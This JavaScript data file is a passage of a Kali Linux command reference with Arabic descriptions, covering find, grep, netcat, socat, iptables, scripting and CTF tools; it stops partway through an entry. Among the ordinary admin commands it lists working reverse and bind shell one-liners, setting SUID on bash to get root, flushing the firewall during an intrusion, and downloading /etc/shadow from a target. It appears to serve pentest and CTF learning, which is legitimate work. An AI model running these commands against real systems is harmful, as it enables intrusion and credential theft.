// ============================================================
// KALI LINUX MASTER COMMANDS DATABASE - PART 7
// Linux System Essentials + Networking + Scripting + CTF Tools
// ============================================================
const CMD_PART7 = [

// ─── LINUX SYSTEM ESSENTIALS ──────────────────────────────────────────────────
{
  id: 701, name: 'find', cat: 'linux', level: 'beginner',
  syntax: 'find [PATH] [OPTIONS] [EXPRESSION]',
  short: 'البحث عن الملفات والمجلدات',
  desc: `find أقوى أمر للبحث عن الملفات في Linux. يدعم البحث بـ: الاسم، الامتداد، الحجم، تاريخ التعديل، الأذونات، المالك، النوع. وأيضاً تنفيذ أوامر على الملفات الموجودة. أساسي في التحليل الجنائي ورفع الصلاحيات.`,
  options: [
    { flag: '-name PATTERN', desc: 'البحث بالاسم (حساس لحالة الأحرف)' },
    { flag: '-iname PATTERN', desc: 'البحث بالاسم (غير حساس)' },
    { flag: '-type f/d/l', desc: 'نوع: ملف/مجلد/رابط رمزي' },
    { flag: '-perm PERM', desc: 'بحث بالأذونات' },
    { flag: '-user USER', desc: 'بحث بالمالك' },
    { flag: '-group GROUP', desc: 'بحث بالمجموعة' },
    { flag: '-size +/-N', desc: 'بحث بالحجم (+أكبر من, -أصغر من)' },
    { flag: '-mtime N', desc: 'تاريخ التعديل: N أيام' },
    { flag: '-exec CMD {} \\;', desc: 'تنفيذ أمر على كل نتيجة' },
    { flag: '-newer FILE', desc: 'أحدث من ملف محدد' },
    { flag: '2>/dev/null', desc: 'إخفاء أخطاء الأذونات' },
  ],
  examples: [
    { cmd: 'find / -perm -u=s -type f 2>/dev/null', desc: 'ملفات SUID (رفع صلاحيات!)' },
    { cmd: 'find / -writable -type f 2>/dev/null | grep -v proc', desc: 'الملفات القابلة للكتابة' },
    { cmd: 'find /etc -name "*.conf" -type f 2>/dev/null', desc: 'ملفات الإعداد' },
    { cmd: 'find / -name "*.key" -o -name "*.pem" -o -name "id_rsa" 2>/dev/null', desc: 'مفاتيح SSH وSSL' },
    { cmd: 'find / -user root -perm -4000 2>/dev/null', desc: 'ملفات SUID مملوكة لـ root' },
    { cmd: 'find /home -name "*.txt" -mtime -7', desc: 'ملفات txt معدّلة آخر 7 أيام' },
    { cmd: 'find . -name "*.php" -exec grep -l "eval\\|base64_decode\\|shell_exec" {} \\;', desc: 'Webshells في PHP' },
    { cmd: 'find / -size +10M -type f 2>/dev/null', desc: 'الملفات الكبيرة جداً' },
  ],
  tips: 'أهم استخدام أمني: find / -perm -u=s يجد SUID bits. أي binary SUID يمكن استغلاله عبر GTFOBins. 2>/dev/null يمنع فيضان أخطاء Permission Denied.',
  related: ['locate', 'grep', 'ls', 'chmod', 'gtfobins'],
},

{
  id: 702, name: 'chmod', cat: 'linux', level: 'beginner',
  syntax: 'chmod [OPTIONS] MODE FILE',
  short: 'تغيير أذونات الملفات والمجلدات',
  desc: `chmod يغير أذونات الملفات والمجلدات. الأذونات ثلاثة أنواع: قراءة (r=4)، كتابة (w=2)، تنفيذ (x=1). ثلاث فئات: مالك (u)، مجموعة (g)، آخرون (o). الرقم الثماني الأكثر شيوعاً: 755, 644, 777. SUID (4xxx), SGID (2xxx), Sticky (1xxx).`,
  options: [
    { flag: '777', desc: 'جميع الأذونات للجميع (خطير!)' },
    { flag: '755', desc: 'مالك كل شيء، آخرون قراءة+تنفيذ' },
    { flag: '644', desc: 'مالك كل شيء، آخرون قراءة فقط' },
    { flag: '600', desc: 'مالك فقط - ملفات المفاتيح' },
    { flag: '+x', desc: 'إضافة إذن التنفيذ' },
    { flag: '-x', desc: 'إزالة إذن التنفيذ' },
    { flag: 'u+s', desc: 'تعيين SUID bit' },
    { flag: '-R', desc: 'تطبيق متكرر (Recursive)' },
  ],
  examples: [
    { cmd: 'chmod +x script.sh', desc: 'جعل الملف قابلاً للتنفيذ' },
    { cmd: 'chmod 755 file.sh', desc: 'أذونات مناسبة للسكريبت' },
    { cmd: 'chmod 600 id_rsa', desc: 'مفتاح SSH (يجب أن يكون 600!)' },
    { cmd: 'chmod 777 /tmp/exploit', desc: 'صلاحيات كاملة' },
    { cmd: 'chmod -R 755 /var/www/', desc: 'أذونات ويب للمجلد' },
    { cmd: 'chmod u+s /bin/bash', desc: 'تعيين SUID على bash (رفع صلاحيات)' },
  ],
  tips: 'مفاتيح SSH تحتاج 600 أو ssh يرفض استخدامها. SUID على /bin/bash يتيح: bash -p للحصول على root shell.',
  related: ['chown', 'ls', 'find', 'umask'],
},

{
  id: 703, name: 'grep', cat: 'linux', level: 'beginner',
  syntax: 'grep [OPTIONS] PATTERN [FILE]',
  short: 'البحث عن نصوص في الملفات',
  desc: `grep أداة البحث في النصوص. تبحث عن نمط (regex أو نص عادي) في الملفات أو الإخراج. لا غنى عنها في: تحليل اللوغات، البحث في قواعد البيانات، تصفية الإخراج، التحليل الجنائي. تدعم تعبيرات Regular Expressions القوية.`,
  options: [
    { flag: '-i', desc: 'غير حساس لحالة الأحرف' },
    { flag: '-r', desc: 'بحث متكرر في المجلدات' },
    { flag: '-n', desc: 'عرض رقم السطر' },
    { flag: '-v', desc: 'عكس النتيجة (غير المطابق)' },
    { flag: '-l', desc: 'أسماء الملفات فقط' },
    { flag: '-c', desc: 'عدد المطابقات' },
    { flag: '-o', desc: 'عرض التطابق فقط (ليس السطر كاملاً)' },
    { flag: '-E', desc: 'Extended Regex (egrep)' },
    { flag: '-A N', desc: 'عرض N سطر بعد التطابق' },
    { flag: '-B N', desc: 'عرض N سطر قبل التطابق' },
    { flag: '--color', desc: 'تلوين التطابقات' },
  ],
  examples: [
    { cmd: 'grep -r "password" /etc/', desc: 'البحث عن كلمة password في /etc' },
    { cmd: 'grep -iE "(user|pass|pwd).*=" config.php', desc: 'بيانات اعتماد في ملفات PHP' },
    { cmd: 'cat /var/log/auth.log | grep "Failed password"', desc: 'محاولات تسجيل دخول فاشلة' },
    { cmd: 'grep -rn "PHPSESSID\\|session_start" *.php', desc: 'بحث في كود PHP' },
    { cmd: 'grep -oE "[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}" log.txt', desc: 'استخراج عناوين IP' },
    { cmd: 'grep -v "^#\\|^$" /etc/ssh/sshd_config', desc: 'إعدادات SSH (بدون تعليقات وفراغات)' },
    { cmd: 'history | grep -i "sudo\\|su\\|passwd"', desc: 'أوامر حساسة في التاريخ' },
  ],
  tips: 'grep -r أقوى أداة للبحث في الكود. zgrep للملفات المضغوطة. ag (Silver Searcher) أسرع من grep.',
  related: ['sed', 'awk', 'find', 'cut', 'sort'],
},

{
  id: 704, name: 'sed', cat: 'linux', level: 'intermediate',
  syntax: 'sed [OPTIONS] "COMMAND" FILE',
  short: 'معالجة وتحرير النصوص بسطر الأوامر',
  desc: `sed (Stream Editor) يعالج النصوص: بحث واستبدال، حذف أسطر، إضافة نص. يعمل على stream (بدون تعديل الملف الأصلي إلا مع -i). أساسي في السكريبتات والأتمتة. يدعم Regular Expressions.`,
  options: [
    { flag: 's/OLD/NEW/', desc: 'استبدال أول تطابق في كل سطر' },
    { flag: 's/OLD/NEW/g', desc: 'استبدال جميع التطابقات' },
    { flag: '-i', desc: 'تعديل الملف مباشرة (In-place)' },
    { flag: '-i.bak', desc: 'تعديل مع نسخة احتياطية' },
    { flag: '/PATTERN/d', desc: 'حذف الأسطر المطابقة' },
    { flag: '-n "p"', desc: 'طباعة أسطر محددة' },
    { flag: '-E', desc: 'Extended Regex' },
  ],
  examples: [
    { cmd: 'sed "s/password123/newpass/g" config.txt', desc: 'استبدال كلمة مرور' },
    { cmd: 'sed -i "s/127.0.0.1/192.168.1.1/g" /etc/hosts', desc: 'تعديل ملف hosts' },
    { cmd: 'sed "/^#/d; /^$/d" config.conf', desc: 'حذف التعليقات والفراغات' },
    { cmd: 'sed -n "1,20p" large_file.txt', desc: 'عرض أول 20 سطر' },
    { cmd: 'sed "s/http:/https:/g" urls.txt', desc: 'تحويل HTTP لـ HTTPS' },
    { cmd: 'sed -E "s/[0-9]+//g" file.txt', desc: 'حذف الأرقام' },
  ],
  tips: 'sed + grep + awk = Swiss Army knife لمعالجة النصوص. -i.bak دائماً أسلم لأنه يحفظ نسخة احتياطية.',
  related: ['awk', 'grep', 'cut', 'tr', 'perl'],
},

{
  id: 705, name: 'awk', cat: 'linux', level: 'intermediate',
  syntax: 'awk [OPTIONS] "PROGRAM" FILE',
  short: 'معالجة النصوص المنظمة واستخراج الأعمدة',
  desc: `awk لغة برمجة متخصصة في معالجة النصوص المنظمة. قوية في استخراج الأعمدة، الحسابات، التقارير. تعمل بمبدأ النمط-الإجراء: عند مطابقة النمط تُنفّذ الإجراء. $1 الحقل الأول، $NF الأخير، NR رقم السطر.`,
  options: [
    { flag: '-F DELIMITER', desc: 'تغيير محدد الحقول (افتراضي مسافة)' },
    { flag: "'{print $N}'", desc: 'طباعة عمود N' },
    { flag: "'{sum += $N} END{print sum}'", desc: 'جمع عمود' },
    { flag: '-v VAR=VALUE', desc: 'تعريف متغير' },
  ],
  examples: [
    { cmd: 'awk "{print $1}" file.txt', desc: 'استخراج العمود الأول' },
    { cmd: 'awk -F: "{print $1, $3}" /etc/passwd', desc: 'اسم المستخدم و UID' },
    { cmd: 'awk -F: "$3 == 0 {print $1}" /etc/passwd', desc: 'المستخدمين بـ UID=0 (root)!' },
    { cmd: 'awk "NR%2==0" file.txt', desc: 'الأسطر الزوجية فقط' },
    { cmd: 'awk "/ERROR/ {print NR": "$0}" log.txt', desc: 'أسطر الأخطاء مع أرقامها' },
    { cmd: 'awk "{sum += $1} END {print sum}" numbers.txt', desc: 'مجموع الأرقام' },
    { cmd: 'awk "length($0) > 80" file.txt', desc: 'الأسطر الطويلة جداً' },
  ],
  tips: 'awk -F: /etc/passwd يعطي معلومات المستخدمين. UID=0 يعني root - أي مستخدم آخر بـ UID=0 مشبوه جداً!',
  related: ['sed', 'grep', 'cut', 'sort', 'uniq'],
},

{
  id: 706, name: 'netstat', cat: 'linux', level: 'beginner',
  syntax: 'netstat [OPTIONS]',
  short: 'عرض إحصائيات الشبكة والمنافذ المفتوحة',
  desc: `netstat يعرض إحصائيات وحالة الشبكة: المنافذ المفتوحة، الاتصالات النشطة، جداول التوجيه، إحصائيات البروتوكول. أداة تشخيص أساسية. ss الأداة الحديثة الأسرع منه.`,
  options: [
    { flag: '-t', desc: 'اتصالات TCP' },
    { flag: '-u', desc: 'اتصالات UDP' },
    { flag: '-l', desc: 'المنافذ المستمعة فقط' },
    { flag: '-n', desc: 'أرقام بدل الأسماء' },
    { flag: '-p', desc: 'عرض PID والبرنامج' },
    { flag: '-a', desc: 'جميع الاتصالات' },
    { flag: '-r', desc: 'جدول التوجيه' },
    { flag: '-i', desc: 'إحصائيات الواجهات' },
  ],
  examples: [
    { cmd: 'netstat -tulnp', desc: 'جميع المنافذ المستمعة مع البرامج' },
    { cmd: 'netstat -an | grep ESTABLISHED', desc: 'الاتصالات النشطة' },
    { cmd: 'netstat -r', desc: 'جدول التوجيه' },
    { cmd: 'netstat -an | grep ":80"', desc: 'الاتصالات على المنفذ 80' },
    { cmd: 'ss -tulnp', desc: 'نفس netstat لكن بـ ss الأحدث' },
    { cmd: 'ss -tp state established', desc: 'الاتصالات المُنشأة' },
  ],
  tips: 'ss أسرع وأحدث من netstat. في التحقيق: ابحث عن منافذ غير عادية واتصالات لـ IPs خارجية مجهولة.',
  related: ['ss', 'lsof', 'nmap', 'iptables', 'tcpdump'],
},

{
  id: 707, name: 'ps', cat: 'linux', level: 'beginner',
  syntax: 'ps [OPTIONS]',
  short: 'عرض العمليات الجارية',
  desc: `ps يعرض العمليات الجارية في النظام. يستطيع عرض: جميع العمليات، العمليات الخاصة بمستخدم، استخدام الموارد، العلاقات بين العمليات. في التحليل الأمني يساعد في اكتشاف العمليات الخبيثة.`,
  options: [
    { flag: 'aux', desc: 'جميع العمليات مع التفاصيل' },
    { flag: '-ef', desc: 'جميع العمليات بتنسيق مختلف' },
    { flag: '-u USER', desc: 'عمليات مستخدم محدد' },
    { flag: '--forest', desc: 'عرض شجري للعمليات' },
    { flag: '-o FORMAT', desc: 'تحديد الأعمدة المعروضة' },
  ],
  examples: [
    { cmd: 'ps aux', desc: 'جميع العمليات بالتفاصيل' },
    { cmd: 'ps aux | grep -v "^www\\|^apache\\|^root"', desc: 'عمليات مستخدمين غير عاديين' },
    { cmd: 'ps aux --sort=-%cpu | head -10', desc: 'أكثر 10 عمليات استهلاكاً للمعالج' },
    { cmd: 'ps -ef --forest', desc: 'شجرة العمليات' },
    { cmd: 'ps aux | grep -i "crypto\\|miner\\|xmrig"', desc: 'البحث عن Cryptominers' },
    { cmd: 'watch -n 1 "ps aux --sort=-%cpu | head -20"', desc: 'مراقبة مستمرة' },
  ],
  tips: 'في التحقيق: ابحث عن عمليات مشبوهة: أسماء غريبة، مسارات /tmp، عمليات بصلاحيات root بدون سبب واضح.',
  related: ['top', 'htop', 'kill', 'pgrep', 'pmap'],
},

{
  id: 708, name: 'ssh', cat: 'linux', level: 'beginner',
  syntax: 'ssh [OPTIONS] [USER@]HOST [COMMAND]',
  short: 'الاتصال الآمن بالخوادم البعيدة',
  desc: `SSH (Secure Shell) بروتوكول للاتصال الآمن بالخوادم البعيدة. يشفر جميع البيانات المنقولة. يتيح: تشغيل الأوامر عن بُعد، نقل الملفات، أنفاق TCP، X11 Forwarding. الأداة الأكثر استخداماً لإدارة الخوادم.`,
  options: [
    { flag: '-p PORT', desc: 'منفذ مخصص' },
    { flag: '-i KEY', desc: 'ملف المفتاح الخاص' },
    { flag: '-L PORT:HOST:PORT', desc: 'Local Port Forwarding' },
    { flag: '-R PORT:HOST:PORT', desc: 'Remote Port Forwarding' },
    { flag: '-D PORT', desc: 'Dynamic SOCKS Proxy' },
    { flag: '-N', desc: 'بدون تنفيذ أوامر (للأنفاق)' },
    { flag: '-v', desc: 'verbose للتشخيص' },
    { flag: '-o StrictHostKeyChecking=no', desc: 'تجاهل تحقق المفتاح' },
    { flag: '-X', desc: 'X11 Forwarding' },
  ],
  examples: [
    { cmd: 'ssh user@192.168.1.10', desc: 'اتصال أساسي' },
    { cmd: 'ssh -p 2222 admin@server.com', desc: 'منفذ مخصص' },
    { cmd: 'ssh -i id_rsa root@192.168.1.10', desc: 'بمفتاح SSH' },
    { cmd: 'ssh user@host "ls -la /etc/"', desc: 'تنفيذ أمر بدون فتح shell' },
    { cmd: 'ssh -L 8080:internalhost:80 user@jump.com -N', desc: 'نفق HTTP' },
    { cmd: 'ssh-keygen -t rsa -b 4096', desc: 'توليد زوج مفاتيح SSH جديد' },
    { cmd: 'ssh-copy-id user@host', desc: 'نسخ المفتاح العام للخادم' },
    { cmd: 'ssh -o "ProxyJump user@jump.host" user@target.host', desc: 'SSH Jumping (Pivoting)' },
  ],
  tips: 'chmod 600 id_rsa قبل الاستخدام. ~/.ssh/config يحفظ إعدادات الاتصالات المتكررة. ProxyJump يسمح SSH عبر خادم وسيط.',
  related: ['scp', 'sftp', 'ssh-keygen', 'ssh-tunnel', 'mosh'],
},

// ─── NETWORK TOOLS ────────────────────────────────────────────────────────────
{
  id: 710, name: 'netcat', cat: 'networking', level: 'beginner',
  syntax: 'nc [OPTIONS] HOST PORT',
  short: 'السكين السويسري لاتصالات الشبكة',
  desc: `Netcat (nc) أداة متعددة الاستخدامات لاتصالات الشبكة. يمكنها: الاتصال بمنافذ TCP/UDP، الاستماع، نقل الملفات، إنشاء Reverse/Bind Shells، Port Scanning. تُسمى "السكين السويسري" للشبكات.`,
  options: [
    { flag: '-l', desc: 'وضع الاستماع (Listen)' },
    { flag: '-v', desc: 'verbose' },
    { flag: '-p PORT', desc: 'منفذ الاستماع' },
    { flag: '-e CMD', desc: 'تنفيذ أمر عند الاتصال (Reverse Shell)' },
    { flag: '-u', desc: 'استخدام UDP' },
    { flag: '-n', desc: 'بدون DNS lookup' },
    { flag: '-w TIMEOUT', desc: 'مهلة الاتصال' },
    { flag: '-z', desc: 'Port Scanning (بدون إرسال بيانات)' },
  ],
  examples: [
    { cmd: 'nc -lvnp 4444', desc: 'استماع على المنفذ 4444 (للـ Reverse Shell)' },
    { cmd: 'nc 192.168.1.10 4444', desc: 'الاتصال بمنفذ' },
    { cmd: 'nc -e /bin/bash 192.168.1.100 4444', desc: 'Reverse Shell (Linux)' },
    { cmd: 'nc 192.168.1.10 80 <<< "GET / HTTP/1.0\\n\\n"', desc: 'طلب HTTP يدوي' },
    { cmd: 'nc -zvn 192.168.1.10 1-1000', desc: 'Port Scan سريع' },
    { cmd: 'nc -l -p 4444 > received_file.txt', desc: 'استقبال ملف' },
    { cmd: 'nc 192.168.1.10 4444 < file_to_send.txt', desc: 'إرسال ملف' },
    { cmd: 'mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | nc 192.168.1.100 4444 > /tmp/f', desc: 'Reverse Shell بدون -e' },
  ],
  tips: 'ncat (nmap) أقوى من nc القديمة مع دعم SSL وIPv6. rlwrap nc يضيف تحسينات للـ shell. pwncat-cs أفضل بديل للـ Reverse Shells.',
  related: ['socat', 'ncat', 'pwncat', 'cryptcat', 'ssh'],
},

{
  id: 711, name: 'socat', cat: 'networking', level: 'intermediate',
  syntax: 'socat [OPTIONS] ADDRESS1 ADDRESS2',
  short: 'إنشاء أنفاق ثنائية الاتجاه',
  desc: `Socat (Socket Cat) أقوى من Netcat. يربط أي نوعين من الاتصالات: TCP, UDP, SSL, UNIX, FILES, PTY. يدعم SSL/TLS الكامل. مفيد في: إنشاء Encrypted Reverse Shells، تحويل المنافذ، ربط واجهات مختلفة.`,
  options: [
    { flag: 'TCP-LISTEN:PORT', desc: 'استماع TCP' },
    { flag: 'TCP:HOST:PORT', desc: 'اتصال TCP' },
    { flag: 'EXEC:/bin/bash', desc: 'تنفيذ أمر' },
    { flag: 'OPENSSL-LISTEN:PORT', desc: 'استماع SSL مشفر' },
    { flag: 'PTY,raw,echo=0', desc: 'Pseudo-TTY للشل التفاعلي' },
    { flag: 'fork', desc: 'قبول اتصالات متعددة' },
  ],
  examples: [
    { cmd: 'socat TCP-LISTEN:4444,reuseaddr EXEC:/bin/bash', desc: 'Bind Shell' },
    { cmd: 'socat TCP:192.168.1.100:4444 EXEC:/bin/bash,pty,stderr', desc: 'Reverse Shell مع TTY' },
    { cmd: 'socat TCP-LISTEN:4444,reuseaddr,fork TCP:192.168.1.10:80', desc: 'Port Forwarding' },
    { cmd: 'socat OPENSSL-LISTEN:4443,cert=cert.pem,verify=0 EXEC:/bin/bash', desc: 'Encrypted Shell' },
    { cmd: 'socat TCP:192.168.1.100:4444 EXEC:"bash -li",pty,stderr,setsid,sigint,sane', desc: 'شل تفاعلي كامل' },
  ],
  tips: 'socat مع PTY يعطي شل تفاعلي كامل بدلاً من raw shell. استخدمه لترقية الـ shell: python3 -c "import pty;pty.spawn(\'/bin/bash\')".',
  related: ['netcat', 'ncat', 'ssh-tunnel', 'chisel'],
},

{
  id: 712, name: 'iptables', cat: 'networking', level: 'intermediate',
  syntax: 'iptables [-t TABLE] COMMAND CHAIN RULE',
  short: 'جدار الحماية وإدارة حركة الشبكة',
  desc: `iptables نظام الجدار الناري الأساسي في Linux. يتحكم في حركة الشبكة الواردة والصادرة والمرورية. ثلاثة جداول رئيسية: filter (الفلترة)، nat (الترجمة)، mangle (التعديل). nftables بديله الحديث.`,
  options: [
    { flag: '-A CHAIN', desc: 'إضافة قاعدة في نهاية السلسلة' },
    { flag: '-I CHAIN N', desc: 'إدراج قاعدة في موضع N' },
    { flag: '-D CHAIN', desc: 'حذف قاعدة' },
    { flag: '-L', desc: 'عرض جميع القواعد' },
    { flag: '-F', desc: 'حذف جميع القواعد (Flush)' },
    { flag: '-p PROTO', desc: 'البروتوكول: tcp, udp, icmp' },
    { flag: '--dport PORT', desc: 'المنفذ الوجهة' },
    { flag: '-j ACTION', desc: 'الإجراء: ACCEPT, DROP, REJECT, LOG' },
    { flag: '-s IP', desc: 'عنوان المصدر' },
    { flag: '-d IP', desc: 'عنوان الوجهة' },
    { flag: '-t nat', desc: 'جدول NAT' },
  ],
  examples: [
    { cmd: 'iptables -L -n -v', desc: 'عرض جميع القواعد' },
    { cmd: 'iptables -A INPUT -p tcp --dport 80 -j ACCEPT', desc: 'السماح بـ HTTP' },
    { cmd: 'iptables -A INPUT -s 192.168.1.100 -j DROP', desc: 'حظر IP محدد' },
    { cmd: 'iptables -A INPUT -p tcp --dport 4444 -j ACCEPT', desc: 'فتح منفذ Reverse Shell' },
    { cmd: 'iptables -t nat -A PREROUTING -p tcp --dport 80 -j REDIRECT --to-port 8080', desc: 'إعادة توجيه المنافذ' },
    { cmd: 'iptables -F && iptables -X', desc: 'حذف جميع القواعد (تعطيل الجدار الناري!)' },
    { cmd: 'iptables -P INPUT DROP && iptables -P FORWARD DROP', desc: 'حظر كل شيء (شديد!)' },
  ],
  tips: 'iptables -F تحذير: تحذف جميع القواعد! في الاختراق: iptables -F لتعطيل جدار الحماية. iptables-save لحفظ القواعد.',
  related: ['nftables', 'ufw', 'firewalld', 'netstat', 'ss'],
},

// ─── SCRIPTING & AUTOMATION ───────────────────────────────────────────────────
{
  id: 720, name: 'bash-scripting', cat: 'scripting', level: 'intermediate',
  syntax: '#!/bin/bash\n[SCRIPT CONTENT]',
  short: 'كتابة سكريبتات Bash للأتمتة',
  desc: `Bash Scripting يتيح أتمتة المهام المتكررة في Linux. يدعم: المتغيرات، الشروط (if/case)، الحلقات (for/while)، الدوال، المعالجة المتوازية. أساسي في أتمتة مهام اختبار الاختراق والاستطلاع.`,
  options: [
    { flag: '#!/bin/bash', desc: 'Shebang - تحديد المفسر' },
    { flag: 'VAR="value"', desc: 'تعريف متغير' },
    { flag: '$VAR', desc: 'استخدام المتغير' },
    { flag: 'if [ cond ]; then', desc: 'جملة شرطية' },
    { flag: 'for i in LIST; do', desc: 'حلقة for' },
    { flag: 'while [ cond ]; do', desc: 'حلقة while' },
    { flag: 'function name() {}', desc: 'تعريف دالة' },
    { flag: '$1, $2, ...', desc: 'معاملات سطر الأوامر' },
    { flag: '$#', desc: 'عدد المعاملات' },
    { flag: '$?', desc: 'كود الخروج من الأمر السابق' },
  ],
  examples: [
    { cmd: '#!/bin/bash\nfor ip in $(cat ips.txt); do nmap -sS $ip -p 80,443; done', desc: 'فحص IPs متعددة' },
    { cmd: '#!/bin/bash\nif [ $# -ne 2 ]; then echo "Usage: $0 <target> <port>"; exit 1; fi', desc: 'التحقق من المعاملات' },
    { cmd: 'for port in $(seq 1 1000); do (echo > /dev/tcp/192.168.1.1/$port) 2>/dev/null && echo "Port $port open"; done', desc: 'Port Scanner بدون أدوات' },
    { cmd: 'while read line; do curl -s -o /dev/null -w "%{http_code}" "$line"; done < urls.txt', desc: 'فحص قائمة URLs' },
    { cmd: 'find / -perm -4000 2>/dev/null | while read file; do ls -la $file; done', desc: 'عرض ملفات SUID' },
  ],
  tips: 'set -euo pipefail في بداية السكريبت لإيقاف التنفيذ عند الخطأ. shellcheck أداة للتحقق من أخطاء الـ Bash.',
  related: ['python-scripting', 'cron', 'bash', 'sh'],
},

{
  id: 721, name: 'python-scripting', cat: 'scripting', level: 'intermediate',
  syntax: 'python3 script.py',
  short: 'استخدام Python في الأمن السيبراني',
  desc: `Python اللغة الأكثر استخداماً في الأمن السيبراني. مكتباتها مثالية لـ: الشبكات (socket, scapy)، ويب (requests, scrapy)، التشفير (cryptography)، التحليل (pandas)، أدوات الاختراق (impacket, pwntools). سهلة التعلم وقوية.`,
  options: [
    { flag: 'import socket', desc: 'اتصالات شبكية' },
    { flag: 'import requests', desc: 'HTTP requests' },
    { flag: 'import scapy', desc: 'تحليل وإنشاء حزم الشبكة' },
    { flag: 'import pwntools', desc: 'أدوات CTF وBuffer Overflow' },
    { flag: 'import impacket', desc: 'بروتوكولات Windows الشبكية' },
    { flag: 'import paramiko', desc: 'SSH بـ Python' },
  ],
  examples: [
    { cmd: 'python3 -c "import socket; s=socket.socket(); s.connect((\'192.168.1.1\',80)); print(s.recv(1024))"', desc: 'اختبار منفذ بسيط' },
    { cmd: 'python3 -c "import pty; pty.spawn(\'/bin/bash\')"', desc: 'ترقية Shell لـ TTY كامل' },
    { cmd: 'python3 -m http.server 8080', desc: 'خادم ويب بسيط لنقل الملفات' },
    { cmd: 'python3 -c "import base64,sys; print(base64.b64decode(sys.argv[1]).decode())" ENCODED', desc: 'فك تشفير Base64' },
    { cmd: 'python3 exploit.py 192.168.1.10 1337', desc: 'تشغيل exploit' },
    { cmd: 'python3 -c "print(\'A\'*200 + \'\\xef\\xbe\\xad\\xde\')"', desc: 'توليد Pattern لـ Buffer Overflow' },
  ],
  tips: 'python3 -m http.server أسرع طريقة لخدمة ملفات للهدف المخترق. pwntools مكتبة CTF ممتازة: from pwn import *.',
  related: ['bash-scripting', 'ruby', 'perl', 'pwntools'],
},

// ─── CTF TOOLS ───────────────────────────────────────────────────────────────
{
  id: 730, name: 'cyberchef', cat: 'ctf', level: 'beginner',
  syntax: 'https://gchq.github.io/CyberChef/',
  short: 'أداة فك الشفرات والتحليل المتعدد',
  desc: `CyberChef "سكينة الجيش السويسري" للتشفير وتحليل البيانات. تدعم مئات العمليات: Base64, ROT13, XOR, AES, RSA, Frequency Analysis, Magic (اكتشاف تلقائي للتشفير). تعمل بالمتصفح أو locally.`,
  examples: [
    { cmd: 'Magic (Auto detect)', desc: 'اكتشاف التشفير تلقائياً' },
    { cmd: 'From Base64 > Gunzip > From Hex', desc: 'سلسلة فك تشفير' },
    { cmd: 'ROT13 > From Hex > Reverse', desc: 'CTF classic decode chain' },
    { cmd: 'Magic > Depth 3', desc: 'اكتشاف عميق متعدد الطبقات' },
  ],
  tips: 'في CTF: جرّب Magic أولاً. إذا فشل جرّب: Base64, Hex, Binary, ROT13, XOR, Morse Code. CyberChef يعمل offline!',
  related: ['hashcat', 'john', 'openssl', 'python-scripting'],
},

{
  id: 731, name: 'pwncat', cat: 'ctf', level: 'intermediate',
  syntax: 'pwncat-cs LHOST:LPORT',
  short: 'نظام استقبال الـ Reverse Shells المتقدم',
  desc: `pwncat-cs (Pwncat Community Script) بديل متقدم لـ Netcat لاستقبال الـ Reverse Shells. يوفر: ترقية Shell تلقائية، نقل ملفات مدمج، تثبيت أدوات على الهدف تلقائياً، استمرارية، تعدد الجلسات.`,
  options: [
    { flag: 'LHOST:LPORT', desc: 'بروتوكول:IP:PORT للاستماع' },
    { flag: 'upload FILE', desc: 'رفع ملف للهدف' },
    { flag: 'download FILE', desc: 'تنزيل ملف من الهدف' },
    { flag: 'run MODULE', desc: 'تشغيل وحدة' },
    { flag: 'back/ctrl+d', desc: 'العودة لـ pwncat shell' },
  ],
  examples: [
    { cmd: 'pwncat-cs -lp 4444', desc: 'استماع على المنفذ 4444' },
    { cmd: 'pwncat-cs 192.168.1.100:4444', desc: 'الاتصال بـ Bind Shell' },
    { cmd: '(pwncat>) upload linpeas.sh /tmp/linpeas.sh', desc: 'رفع linpeas للهدف' },
    { cmd: '(pwncat>) download /etc/shadow shadow.txt', desc: 'تنزيل ملف shadow' },
    { cmd: 'pip3 install pwncat-cs', desc: 'تثبيت pwncat' },
  ],
  tips: 'Ctrl+D للتبديل بين shell الهدف وبيئة pwncat. run enumerate.gather تجمع معلومات النظام تلقائياً.',
  related: ['netcat', 'socat', 'metasploit', 'meterpreter'],
},

{
  id: 732, name: 'openssl', cat: 'cryptography', level: 'intermediate',
  syntax: 'openssl COMMAND [OPTIONS]',
  short: 'أدوات التشفير وإدارة الشهادات',
  desc: `OpenSSL مجموعة أدوات للتشفير وبروتوكولات SSL/TLS وإدارة الشهادات. يمكنه: توليد المفاتيح والشهادات، اختبار الخوادم SSL، تشفير الملفات، التحقق من التواقيع، كسر التشفير الضعيف.`,
  options: [
    { flag: 'enc', desc: 'تشفير/فك تشفير ملف' },
    { flag: 'genrsa', desc: 'توليد مفتاح RSA' },
    { flag: 'req', desc: 'إنشاء طلب شهادة CSR' },
    { flag: 'x509', desc: 'إدارة شهادات X.509' },
    { flag: 's_client', desc: 'اختبار اتصال SSL' },
    { flag: 'dgst', desc: 'حساب هاش ملف' },
    { flag: 'passwd', desc: 'توليد هاش كلمة مرور' },
  ],
  examples: [
    { cmd: 'openssl enc -aes-256-cbc -in file.txt -out file.enc -k password', desc: 'تشفير ملف بـ AES' },
    { cmd: 'openssl enc -d -aes-256-cbc -in file.enc -out file.txt -k password', desc: 'فك تشفير ملف' },
    { cmd: 'openssl s_client -connect target.com:443', desc: 'فحص شهادة SSL' },
    { cmd: 'openssl dgst -sha256 file.txt', desc: 'حساب SHA256' },
    { cmd: 'openssl genrsa -out private.key 2048', desc: 'توليد مفتاح RSA 2048-bit' },
    { cmd: 'openssl passwd -apr1 "mypassword"', desc: 'توليد هاش كلمة مرور Apache' },
    { cmd: 'openssl s_client -connect target.com:443 2>/dev/null | openssl x509 -noout -text', desc: 'تفاصيل الشهادة' },
  ],
  tips: 'openssl s_client يكشف: نسخة TLS، مجموعة التشفير، تاريخ انتهاء الشهادة، ومعلومات الـ CN. مفيد في فحص SSL Vulnerabilities.',
  related: ['nmap-ssl', 'testssl', 'sslyze', 'certbot'],
},

{
  id: 733, name: 'john-extra', cat: 'ctf', level: 'intermediate',
  syntax: 'john2xxx FILE > hash.txt && john hash.txt',
  short: 'استخراج هاشات من ملفات مختلفة لـ John',
  desc: `مجموعة أدوات john المساعدة تستخرج الهاشات من ملفات مختلفة: ZIP, PDF, Office, SSH, GPG, KeePass, وأكثر. بعد الاستخراج يكسرها john أو hashcat.`,
  examples: [
    { cmd: 'zip2john protected.zip > zip.hash && john zip.hash', desc: 'كسر ZIP مشفر' },
